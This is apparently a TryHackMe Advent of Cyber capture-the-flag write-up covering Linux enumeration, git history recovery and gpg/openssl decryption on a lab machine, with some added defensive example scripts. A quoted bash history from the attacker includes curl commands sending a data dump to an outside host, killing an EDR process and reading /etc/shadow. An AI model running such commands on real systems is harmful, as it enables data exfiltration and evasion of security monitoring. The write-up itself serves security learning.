Advent of Cyber Day -1 | Side Quest -1 | Shells Bells | TryHackMe
I won't be sharing Flags for ethical reasons. You will have to follow the write-up to get them.
Initial setup
To get started, you need to start the target machine on TryHackMe and SSH into it from your VM. You can obviously use the VM you are given there, too. However, it's always better to use your own VM.
So let's get started.
The Advent of Cyber Challenge
This doesn't need any write-up, as everything is already there on the website, guiding you step by step on how to solve it. Still, let me give a short, summarized write-up on how to get all the Flags, and then we will move on to the Side Quest.
First Flag
As you SSH to the system, you see a README.txt file which contains the following info:
For all TBFC members,
Yesterday I spotted yet another Eggsploit on our servers.
Not sure what it means yet, but Wareville is in danger.
To be prepared, I'll write the security guide by tomorrow.
As a precaution, I'll also hide the guide from plain view.
~ McSkidy
Along with all these files, you will see a folder named Guides. Change into that directory: a plain ls there shows nothing, but ls -la reveals a hidden file:
mcskidy@tbfc-web01:~/Guides$ ls -la
total 12
drwxrwxr-x 2 mcskidy mcskidy 4096 Oct 29 20:46 .
drwxr-x--- 21 mcskidy mcskidy 4096 Nov 13 17:10 ..
-rw-rw-r-- 1 mcskidy mcskidy 506 Oct 29 20:46 .guide.txt
Read that file:
mcskidy@tbfc-web01:~/Guides$ cat .guide.txt
I think King Malhare from HopSec Island is preparing for an attack.
Not sure what his goal is, but Eggsploits on our servers are not good.
Be ready to protect Christmas by following this Linux guide:
Check /var/log/ and grep inside, let the logs become your guide.
Look for eggs that want to hide, check their shells for what's inside!
P.S. Great job finding the guide. Your flag is:
-----------------------------------------------
THM{learning-li***-***}
-----------------------------------------------
Here you got your first flag.
Second Flag
It says to check the /var/log directory and grep there. Looking at auth.log, you can see multiple failed login attempts. So let's get into the socmas home directory:
mcskidy@tbfc-web01:/var/log$ cd /home/socmas/2025
mcskidy@tbfc-web01:/home/socmas/2025$ ls
eggstrike.sh index.html node_modules package.json package-lock.json secret-server.js wishlist.txt
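The failed logins mentioned above are the kind of thing worth counting rather than eyeballing. The shell snippet below is an added example, not part of the write-up or the TryHackMe room: it runs over a few constructed sshd lines in the auth.log format (the hostname, IPs and usernames are made up) and summarises failed password attempts per source address, then flags any source that later got an Accepted login, which is the pattern a defender wants to spot after a brute-force run.

```shell
#!/bin/sh
# Added example (not from the write-up): triage failed SSH logins in an auth.log-style file.
# The log lines below are constructed for this demo, not taken from the target box.

AUTH_SAMPLE=$(mktemp)
cat > "$AUTH_SAMPLE" <<'EOF'
Nov 13 17:01:02 tbfc-web01 sshd[1201]: Failed password for invalid user admin from 10.10.14.7 port 51022 ssh2
Nov 13 17:01:05 tbfc-web01 sshd[1201]: Failed password for invalid user admin from 10.10.14.7 port 51024 ssh2
Nov 13 17:01:09 tbfc-web01 sshd[1203]: Failed password for socmas from 10.10.14.7 port 51030 ssh2
Nov 13 17:02:11 tbfc-web01 sshd[1210]: Accepted password for socmas from 10.10.14.7 port 51044 ssh2
Nov 13 17:05:40 tbfc-web01 sshd[1222]: Failed password for mcskidy from 192.168.1.20 port 40022 ssh2
Nov 13 17:06:00 tbfc-web01 sudo: mcskidy : TTY=pts/0 ; PWD=/home/mcskidy ; USER=root ; COMMAND=/bin/su
EOF

# failed_logins_by_ip FILE -> "count ip" lines, most frequent source first
failed_logins_by_ip() {
    grep 'sshd\[[0-9]*\]: Failed password' "$1" \
      | sed -n 's/.* from \([0-9.]*\) port .*/\1/p' \
      | sort | uniq -c | sort -rn \
      | awk '{print $1, $2}'
}

# failed_count FILE IP -> number of failed attempts from IP (0 if none)
failed_count() {
    failed_logins_by_ip "$1" \
      | awk -v ip="$2" '$2 == ip {print $1; found=1} END {if (!found) print 0}'
}

# accepted_after_failures FILE -> source IPs that failed and then got an "Accepted" login
accepted_after_failures() {
    for ip in $(failed_logins_by_ip "$1" | awk '{print $2}'); do
        grep -q "Accepted password for .* from $ip " "$1" && echo "$ip"
    done
}

echo "failed attempts per source:"
failed_logins_by_ip "$AUTH_SAMPLE"
echo "sources that failed, then succeeded:"
accepted_after_failures "$AUTH_SAMPLE"
```

On a real host you would point these functions at /var/log/auth.log (or at journalctl -u ssh output); the sshd message formats used in the patterns are the standard OpenSSH ones.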
Now let's read the eggstrike.sh file, and you will get the second Flag:
mcskidy@tbfc-web01:/home/socmas/2025$ cat eggstrike.sh
# Eggstrike v0.3
# © 2025, Sir Carrotbane, HopSec
cat wishlist.txt | sort | uniq > /tmp/dump.txt
rm wishlist.txt && echo "Chistmas is fading..."
mv eastmas.txt wishlist.txt && echo "EASTMAS is invading!"
# Your flag is:
# THM{sir-carrotbane-attacks}
Third Flag
Now, as per the official Guide, you need to switch to the root user:
mcskidy@tbfc-web01:/home/socmas/2025$ sudo su
root@tbfc-web01:/home/socmas/2025$ cd /root/
root@tbfc-web01:~$ ls -la
total 80
drwx------ 11 root root 4096 Nov 13 16:52 .
drwxr-xr-x 22 root root 4096 Dec 2 11:57 ..
-rw------- 1 root root 289 Dec 2 12:24 .bash_history
-rw-r--r-- 1 root root 3812 Nov 11 16:26 .bashrc
-rw-r--r-- 1 root root 3812 Oct 13 01:06 .bashrc.bak
drwxr-xr-x 5 root root 4096 Oct 8 12:30 .cache
drwx------ 3 root root 4096 Oct 3 2024 .config
drwx------ 3 root root 4096 Oct 8 12:30 .dbus
drwx------ 3 root root 4096 Oct 3 2024 .launchpadlib
drwxr-xr-x 3 root root 4096 Feb 27 2022 .local
-rw-r--r-- 1 root root 161 Nov 11 16:26 .profile
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile.bak
-rw-r--r-- 1 root root 66 Feb 27 2022 .selected_editor
drwx------ 2 root root 4096 Oct 13 01:37 .ssh
-rw------- 1 root root 10711 Nov 11 14:21 .viminfo
drwxr-xr-x 2 root root 4096 Feb 27 2022 .vnc
drwxr-xr-x 2 root root 4096 Nov 11 16:26 fix_passfrag_backups_20251111162618
drwxr-xr-x 5 root root 4096 Sep 1 2024 snap
Read the .bash_history file:
root@tbfc-web01:~$ cat .bash_history
whoami
cd ~
ll
nano .ssh/authorized_keys
curl --data "@/tmp/dump.txt" http://files.hopsec.thm/upload
curl --data "%qur\(tq_` :D AH?65P" http://red.hopsec.thm/report
curl --data "THM{until-we-meet-again}" http://flag.hopsec.thm
pkill tbfcedr
cat /etc/shadow
cat /etc/hosts
exit
cd /root/
ls -la
This was the final flag.
For those who consider themself intermediate and want another challenge, check McSkidy's hidden note in /home/mcskidy/Documents/ to get access to the key for Side Quest 1!
Side Quest 1
Change to the directory named in the message above and run ls -la:
root@tbfc-web01:/home/mcskidy/Documents$ ls -la
total 12
drwxr-xr-x 2 mcskidy mcskidy 4096 Oct 29 20:48 .
drwxr-x--- 21 mcskidy mcskidy 4096 Nov 13 17:10 ..
-rw-rw-r-- 1 mcskidy mcskidy 1078 Oct 29 20:48 read-me-please.txt
Now read the file:
root@tbfc-web01:/home/mcskidy/Documents$ cat read-me-please.txt
From: mcskidy
To: whoever finds this
I had a short second when no one was watching. I used it.
I've managed to plant a few clues around the account.
If you can get into the user below and look carefully,
those three little "easter eggs" will combine into a passcode
that unlocks a further message that I encrypted in the
/home/eddi_knapp/Documents/ directory.
I didn't want the wrong eyes to see it.
Access the user account:
username: eddi_knapp
password: S0mething1Sc0ming
There are three hidden easter eggs.
They combine to form the passcode to open my encrypted vault.
Clues (one for each egg):
1)
I ride with your session, not with your chest of files.
Open the little bag your shell carries when you arrive.
2)
The tree shows today; the rings remember yesterday.
Read the ledger’s older pages.
3)
When pixels sleep, their tails sometimes whisper plain words.
Listen to the tail.
Find the fragments, join them in order, and use the resulting passcode
to decrypt the message I left. Be careful — I had to be quick,
and I left only enough to get help.
~ McSkidy
Alright, so we now know that we have to get 3 fragments of the password and then combine them to get the final password that will unlock some vault.
First Frag
Switch from root to the eddi_knapp user, go to its home directory, and run ls -la:
eddi_knapp@tbfc-web01:~$ ls -la
total 120
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 1 08:52 .
drwxr-xr-x 6 root root 4096 Oct 10 17:27 ..
-rw-r--r-- 1 eddi_knapp eddi_knapp 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 eddi_knapp eddi_knapp 3797 Nov 11 16:24 .bashrc
-rw-r--r-- 1 eddi_knapp eddi_knapp 3797 Nov 11 16:19 .bashrc.bak
drwxrwxr-x 3 eddi_knapp eddi_knapp 4096 Nov 30 18:18 .cache
drwx------ 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 .config
drwx------ 3 eddi_knapp eddi_knapp 4096 Dec 1 08:32 .gnupg
-rw------- 1 eddi_knapp eddi_knapp 68 Oct 10 18:16 .image_meta
-rw------- 1 eddi_knapp eddi_knapp 20 Oct 10 10:34 .lesshst
drwxrwxr-x 4 eddi_knapp eddi_knapp 4096 Nov 30 18:18 .local
-rw------- 1 eddi_knapp eddi_knapp 19 Nov 11 16:30 .pam_environment
-rw------- 1 eddi_knapp eddi_knapp 19 Nov 11 16:24 .pam_environment.bak
-rw-r--r-- 1 eddi_knapp eddi_knapp 833 Nov 11 16:30 .profile
-rw-r--r-- 1 eddi_knapp eddi_knapp 833 Nov 11 16:24 .profile.bak
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:32 .secret
drwx------ 3 eddi_knapp eddi_knapp 4096 Nov 11 12:07 .secret_git
drwx------ 3 eddi_knapp eddi_knapp 4096 Oct 9 17:20 .secret_git.bak
-rw------- 1 eddi_knapp eddi_knapp 7167 Nov 11 16:23 .viminfo
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:15 Desktop
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Nov 14 19:31 Documents
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:15 Downloads
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Music
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:16 Pictures
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Public
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Templates
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 9 16:50 Videos
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Nov 11 16:24 fix_passfrag_backups_20251111162432
-rw-rw-r-- 1 eddi_knapp eddi_knapp 429 Oct 9 17:53 wget-log
Looking through the files, you will see the .pam_environment file. (If you are wondering what that file is used for in Linux: PAM reads it at login to set environment variables for the user.) Read it:
eddi_knapp@tbfc-web01:~$ cat .pam_environment
PASSFRAG1="3as***"
Now we have the first fragment of the password; let's hunt for the second one.
Second Frag
The hint for the second frag says:
The tree shows today; the rings remember yesterday.
Read the ledger’s older pages.
When reading this at first, I thought it was telling me to read the .bash_history file, but it was not there. So after a little enumeration, I got into the .secret_git directory, where I found that the .git folder is still there, which means that I can see what was in that directory, and if there are any committed changes, I would be able to roll back to them and read them.
eddi_knapp@tbfc-web01:~/.secret_git$ git log
commit e924698378132991ee08f050251242a092c548fd (HEAD -> master)
Author: mcskiddy <[email protected]>
Date: Thu Oct 9 17:20:11 2025 +0000
remove sensitive note
commit d12875c8b62e089320880b9b7e41d6765818af3d
Author: McSkidy <[email protected]>
Date: Thu Oct 9 17:19:53 2025 +0000
add private note
And yes, we were right about this, so let's reverse these commits and try to read whatever we have there.
So, from the commit history, we know that the last commit removed the sensitive notes from the directory, so in order to read that note, we will have to roll back to the first commit.
eddi_knapp@tbfc-web01:~/.secret_git$ git checkout d12875c8b62e089320880b9b7e41d6765818af3d
Note: switching to 'd12875c8b62e089320880b9b7e41d6765818af3d'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at d12875c add private note
Now we have a file named secret_note.txt, read that file:
eddi_knapp@tbfc-web01:~/.secret_git$ cat secret_note.txt
========================================
Private note from McSkidy
========================================
We hid things to buy time.
PASSFRAG2: -***
We now have the second fragment of the final password. It's time for the third fragment.
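The technique here, that a later commit deleting a file does not remove it from history, is worth seeing in a form you can run anywhere. The script below is an added example, not from the write-up or the room: it builds a throwaway repository with the same two-commit shape (add, then remove) using constructed file contents, and reads the deleted file back with git show <commit>:<path>, which avoids the detached-HEAD checkout used above. It also sweeps every revision for a pattern with git grep, which is how you would audit a repository for secrets that were "removed" rather than purged.

```shell
#!/bin/sh
# Added example (not from the write-up): a deleted file survives in git history.
# The repository, file name and contents below are constructed for this demo.

DEMO_REPO=$(mktemp -d)

# build_demo_repo DIR -> "add private note" commit followed by "remove sensitive note"
build_demo_repo() {
    git -C "$1" init -q
    git -C "$1" config user.email "demo@example.invalid"
    git -C "$1" config user.name "demo"
    printf 'Private note\nPASSFRAG2: -demo\n' > "$1/secret_note.txt"
    git -C "$1" add secret_note.txt
    git -C "$1" commit -q -m "add private note"
    git -C "$1" rm -q secret_note.txt
    git -C "$1" commit -q -m "remove sensitive note"
}

# commits_touching DIR PATH -> hash of every commit that added, changed or deleted PATH
commits_touching() {
    git -C "$1" log --all --format=%H -- "$2"
}

# recover_deleted DIR PATH -> contents of PATH from the newest commit that still had it
recover_deleted() {
    for c in $(commits_touching "$1" "$2"); do
        # cat-file -e fails for the deleting commit (path absent), succeeds for the one before
        if git -C "$1" cat-file -e "$c:$2" 2>/dev/null; then
            git -C "$1" show "$c:$2"
            return 0
        fi
    done
    return 1
}

# grep_history DIR PATTERN -> "commit:path" for every revision in which PATTERN appears
grep_history() {
    git -C "$1" log --all --format=%H | while read -r c; do
        git -C "$1" grep -l "$2" "$c" 2>/dev/null
    done
}

build_demo_repo "$DEMO_REPO"
echo "tracked files at HEAD (none, the note is 'gone'):"
git -C "$DEMO_REPO" ls-files
echo "recovered from history:"
recover_deleted "$DEMO_REPO" secret_note.txt
echo "revisions containing PASSFRAG:"
grep_history "$DEMO_REPO" PASSFRAG
```

The defensive takeaway: a commit that deletes a secret is not remediation. The secret has to be rotated, and if the history itself must be cleaned, that means rewriting it (git filter-repo or similar) and force-pushing, which every clone then has to pick up.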
Third Frag
The hint says:
When pixels sleep, their tails sometimes whisper plain words.
Listen to the tail.
After reading this, the first thing that comes to mind is that some of the images hide data through steganography and we need to get the flag out of them.
But I was brutally wrong here…
I wasted so much of my time looking through the images and extracting data from them, and the file containing the flag was right there, but it was not some image.
First, switch to the Pictures directory and run the ls command:
eddi_knapp@tbfc-web01:~/Pictures$ ls
banner_01.jpg family_holiday.jpg large_photo_2.jpg office_building.png profile_pic.png scenery_01.png scuffed_2.jpg wallpaper_spring.png
banner_02.png holiday_card.jpg large_photo_3.jpg photo_meta_1.txt random_image_001.png scenery_02.jpg scuffed_3.jpg work_event.png
conference_badge.jpg kids_playground.jpg logo_asset.png photo_meta_2.txt random_image_002.jpg screenshot_2025-06-01.png vacation_beach.jpg
easter.png large_photo_1.jpg meme_asset.png photo_meta_3.txt receipt_scan.jpg scuffed_1.jpg wallpaper_autumn.png
Now, going through the files, you will think that easter.png is the most likely candidate to hold the flag, right?
I thought the same, but none of these files contains the last fragment; instead, we have to run ls -la, which also lists the hidden files in that directory.
eddi_knapp@tbfc-web01:~/Pictures$ ls -la
total 160680
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Oct 10 18:16 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 12:58 ..
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1442 Oct 9 18:07 .easter_egg
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Aug 13 18:15 .hidden_pic_1.png
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Jul 20 18:15 .hidden_pic_2.png
-rw-r--r-- 1 eddi_knapp eddi_knapp 5871771 Sep 11 18:15 .hidden_pic_3.png
--------------------- SNIP ---------------------
The file named .easter_egg contains the last frag we need:
eddi_knapp@tbfc-web01:~/Pictures$ cat .easter_egg
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@#+==+*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%+=+*++@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@*++**+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@%%#*====+#%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#*===-===#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@%*++:-+====*%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@%*===++++===-+*#######%%@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@%*+===+++==::-=========+*#%@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@%%#**+======-:-==--==-==+*%@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%*+======---=+===------=#%@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%**+=-=====-==+==-====--=*%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@%***+++==--=====+=----=-=#@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%#**++=--=====++====----*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@%*+=-:=++**++**+=-::--*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@#+=:.+#***=*#=--::-=-=%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%%*+-:+%#+++=++=:::==--*%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%*+=--*@#++===::::::::=#%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@%%%##*#%%%####***#*#####%%@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%%###%%%%%%%%%%##%%##%%@@@@@@@@@@@@
~~ HAPPY EASTER ~~~
PASSFRAG3: c0M***
Now that we have all the fragments of the password, we can combine them to decrypt the vault in /home/eddi_knapp/Documents/.
eddi_knapp@tbfc-web01:~/Pictures$ cd /home/eddi_knapp/Documents/
eddi_knapp@tbfc-web01:~/Documents$ ls -la
total 16
drwxr-xr-x 2 eddi_knapp eddi_knapp 4096 Nov 14 19:31 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 12:58 ..
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1004 Nov 14 19:31 mcskidy_note.txt.gpg
-rw-r--r-- 1 eddi_knapp eddi_knapp 108 Oct 10 18:15 notes_on_photos.txt
We have two files here: one is plain text, the other is encrypted.
eddi_knapp@tbfc-web01:~/Documents$ cat notes_on_photos.txt
Photo notes:
- backup all images weekly
- sync with phone when connected
- organize into 3 folders per year
Then I tried to extract the encrypted note, but it didn't work:
gpg: AES256.CFB encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: Bad session key
Since we already had root user access, we can use that account to decrypt the file, I guess:
root@tbfc-web01:/home/eddi_knapp/Documents$ gpg -d mcskidy_note.txt.gpg
┌──────────────────────────────────────────────────────┐
│ Please enter the passphrase for decryption. │
│ │
│ Passphrase: ________________________________________ │
│ │
│ <OK> <Cancel> │
└──────────────────────────────────────────────────────┘
You will be prompted to enter the password: combine all the fragments we collected so far; it will serve as the password here.
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
Congrats — you found all fragments and reached this file.
Below is the list that should be live on the site. If you replace the contents of
/home/socmas/2025/wishlist.txt with this exact list (one item per line, no numbering),
the site will recognise it and the takeover glitching will stop. Do it — it will save the site.
Hardware security keys (YubiKey or similar)
Commercial password manager subscriptions (team seats)
Endpoint detection & response (EDR) licenses
Secure remote access appliances (jump boxes)
Cloud workload scanning credits (container/image scanning)
Threat intelligence feed subscription
Secure code review / SAST tool access
Dedicated secure test lab VM pool
Incident response runbook templates and playbooks
Electronic safe drive with encrypted backups
A final note — I don't know exactly where they have me, but there are *lots* of eggs
and I can smell chocolate in the air. Something big is coming. — McSkidy
---
When the wishlist is corrected, the site will show a block of ciphertext. This ciphertext can be decrypted with the following unlock key:
UNLOCK_KEY: 91J6X7R4FQ9TQ************
To decode the ciphertext, use OpenSSL. For instance, if you copied the ciphertext into a file /tmp/website_output.txt you could decode using the following command:
cat > /tmp/website_output.txt
openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in /tmp/website_output.txt -out /tmp/decoded_message.txt -pass pass:'91J6X7R4FQ9TQ**********'
cat /tmp/decoded_message.txt
Sorry to be so convoluted, I couldn't risk making this easy while King Malhare watches. — McSkidy
Alright, now we know what to do, let's get it done:
root@tbfc-web01:/home/eddi_knapp/Documents$ sudo nano /home/socmas/2025/wishlist.txt
Replace the text there with the list we got above; make sure to remove the space between the two paragraphs, otherwise it won't work.
Now open Firefox and go to http://ip_address:8080; at the bottom of the website you will get a long encrypted string. Copy that string to a file. I will name that file cipher.txt.
root@tbfc-web01:/home/eddi_knapp/Documents$ sudo nano cipher.txt
root@tbfc-web01:/home/eddi_knapp/Documents$ openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -in cipher.txt -out message.txt -pass pass:'91J6X7R4FQ9TQ********'
root@tbfc-web01:/home/eddi_knapp/Documents$ cat message.txt
Well done — the glitch is fixed. Amazing job going the extra mile and saving the site. Take this flag THM{w3lcome_2_***_****}
NEXT STEP:
If you fancy something a little...spicier....use the FLAG you just obtained as the passphrase to unlock:
/home/eddi_knapp/.secret/dir
That hidden directory has been archived and encrypted with the FLAG.
Inside it you'll find the sidequest key.
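Every option in that openssl command feeds the key derivation, so a mismatch anywhere makes the decryption fail. The script below is an added example, not from the write-up or the room: it encrypts a constructed message with the same settings (AES-256-CBC, PBKDF2 with 200000 iterations, salted, base64 output) under a placeholder passphrase that is not the real unlock key, then shows that decryption only recovers the message when both the passphrase and the iteration count match.

```shell
#!/bin/sh
# Added example (not from the write-up): round-trip through the note's openssl settings.
# DEMO_KEY and DEMO_MSG are constructed placeholders, not the real unlock key or message.

DEMO_KEY='DEMO-UNLOCK-KEY-NOT-THE-REAL-ONE'
DEMO_MSG='Well done - this is a constructed test message.'

# enc_message KEY TEXT -> single-line base64 ciphertext (random salt, so it differs per run)
enc_message() {
    printf '%s' "$2" \
      | openssl enc -aes-256-cbc -pbkdf2 -iter 200000 -salt -base64 -A -pass "pass:$1"
}

# dec_message KEY ITER B64 -> whatever openssl produces; errors are silenced so callers compare output
dec_message() {
    printf '%s' "$3" \
      | openssl enc -d -aes-256-cbc -pbkdf2 -iter "$2" -salt -base64 -A -pass "pass:$1" 2>/dev/null \
      || true
}

# decrypt_matches KEY ITER B64 EXPECTED -> "yes" if decryption yields exactly EXPECTED, else "no"
decrypt_matches() {
    if [ "$(dec_message "$1" "$2" "$3")" = "$4" ]; then echo yes; else echo no; fi
}

CT=$(enc_message "$DEMO_KEY" "$DEMO_MSG")
echo "ciphertext: $CT"
echo "right key, 200000 iterations: $(decrypt_matches "$DEMO_KEY" 200000 "$CT" "$DEMO_MSG")"
echo "right key,  10000 iterations: $(decrypt_matches "$DEMO_KEY" 10000 "$CT" "$DEMO_MSG")"
echo "wrong key, 200000 iterations: $(decrypt_matches "WRONG-$DEMO_KEY" 200000 "$CT" "$DEMO_MSG")"
```

The comparison is on the recovered plaintext rather than on openssl's exit status on purpose: with a wrong key or iteration count the derived key is different, so the final block almost always fails the PKCS#7 padding check ("bad decrypt"), but about one time in 256 the padding happens to look valid and openssl exits 0 with garbage. Leaving out -pbkdf2 entirely would switch to the legacy EVP_BytesToKey derivation and fail in the same way.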
Here we go, another flag with yet another task to complete. Let's get this done, too.
root@tbfc-web01:/home/eddi_knapp/Documents$ gpg -d /home/eddi_knapp/.secret/dir.tar.gz.gpg > dir.tar.gz
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
Extracting the decoded folder:
root@tbfc-web01:/home/eddi_knapp/Documents$ tar -xzf dir.tar.gz
root@tbfc-web01:/home/eddi_knapp/Documents$ ls -la
total 440
drwxr-xr-x 3 eddi_knapp eddi_knapp 4096 Dec 2 14:28 .
drwxr-x--- 18 eddi_knapp eddi_knapp 4096 Dec 2 14:05 ..
-rw-r--r-- 1 root root 557 Dec 2 14:22 cipher.txt
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:25 dir
-rw-r--r-- 1 root root 419499 Dec 2 14:27 dir.tar.gz
-rw-rw-r-- 1 eddi_knapp eddi_knapp 1004 Nov 14 19:31 mcskidy_note.txt.gpg
-rw-r--r-- 1 root root 385 Dec 2 14:23 message.txt
-rw-r--r-- 1 eddi_knapp eddi_knapp 108 Oct 10 18:15 notes_on_photos.txt
We got a directory named dir. Get into the dir and list the files:
root@tbfc-web01:/home/eddi_knapp/Documents/dir$ cd dir; ls -la
bash: cd: dir: No such file or directory
total 420
drwxrwxr-x 2 eddi_knapp eddi_knapp 4096 Dec 1 08:25 .
drwxr-xr-x 3 eddi_knapp eddi_knapp 4096 Dec 2 14:28 ..
-rw-r--r-- 1 eddi_knapp eddi_knapp 420812 Nov 30 18:18 sq1.png
An image file. Great, this is the end of Side Quest 1. We got all the flags, and I hope it was equally fun for you as it was for me. See you in the next write-up.
HAPPY HACKING